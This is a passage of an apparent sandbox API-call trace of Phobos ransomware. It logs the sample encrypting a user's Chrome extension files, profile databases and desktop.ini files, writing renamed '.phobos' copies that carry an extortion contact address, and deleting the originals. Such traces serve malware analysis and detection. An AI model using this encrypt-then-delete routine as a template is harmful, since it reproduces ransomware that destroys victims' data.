Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.613] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=15730) returned 1 [0165.613] CloseHandle (hObject=0x194) returned 1 [0165.613] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0165.613] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.613] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.613] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.614] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.614] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3d72, lpOverlapped=0x0) returned 1 [0165.617] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d80, dwBufLen=0x3d80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d80) returned 1 [0165.617] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3d80, lpOverlapped=0x0) returned 1 [0165.618] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0165.618] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.618] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.618] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0165.618] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.618] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.618] CloseHandle (hObject=0x194) returned 1 [0165.618] CloseHandle (hObject=0x138) returned 1 [0165.618] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json")) returned 1 [0165.619] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.620] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=29337) returned 1 [0165.620] CloseHandle (hObject=0x138) returned 1 [0165.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json")) returned 0x2020 [0165.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.620] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.620] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.858] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0165.858] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.858] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7299, lpOverlapped=0x0) returned 1 [0165.905] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x72a0, dwBufLen=0x72a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x72a0) returned 1 [0165.905] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x72a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x72a0, lpOverlapped=0x0) returned 1 [0165.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0165.906] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.906] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0165.906] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.906] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0165.906] CryptDestroyKey (hKey=0xa32be8) returned 1 [0165.906] CloseHandle (hObject=0x138) returned 1 [0165.906] CloseHandle (hObject=0x134) returned 1 [0165.906] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json")) returned 1 [0165.907] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.908] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=0) returned 1 [0165.909] CloseHandle (hObject=0x134) returned 1 [0165.909] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.909] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16384) returned 1 [0165.909] CloseHandle (hObject=0x134) returned 1 [0165.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db")) returned 0x2020 [0165.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.909] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.910] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0165.910] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.910] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4000, lpOverlapped=0x0) returned 1 [0165.961] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010, dwBufLen=0x4010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010) returned 1 [0165.961] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4010, lpOverlapped=0x0) returned 1 [0165.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0165.963] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.963] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0165.963] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.963] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0165.963] CryptDestroyKey (hKey=0xa32be8) returned 1 [0165.963] CloseHandle (hObject=0x134) returned 1 [0165.963] CloseHandle (hObject=0x138) returned 1 [0165.963] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db")) returned 1 [0165.964] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.982] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0165.982] CloseHandle (hObject=0x138) returned 1 [0165.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini")) returned 0x2026 [0165.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.982] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.982] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.983] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0165.983] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.983] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0165.983] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0165.983] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0165.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0165.984] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.984] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.984] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.984] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.984] CryptDestroyKey (hKey=0xa32be8) returned 1 [0165.984] CloseHandle (hObject=0x138) returned 1 [0165.984] CloseHandle (hObject=0x134) returned 1 [0165.984] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini")) returned 1 [0165.985] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.986] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0165.986] CloseHandle (hObject=0x134) returned 1 [0165.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini")) returned 0x2026 [0165.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.986] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.986] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 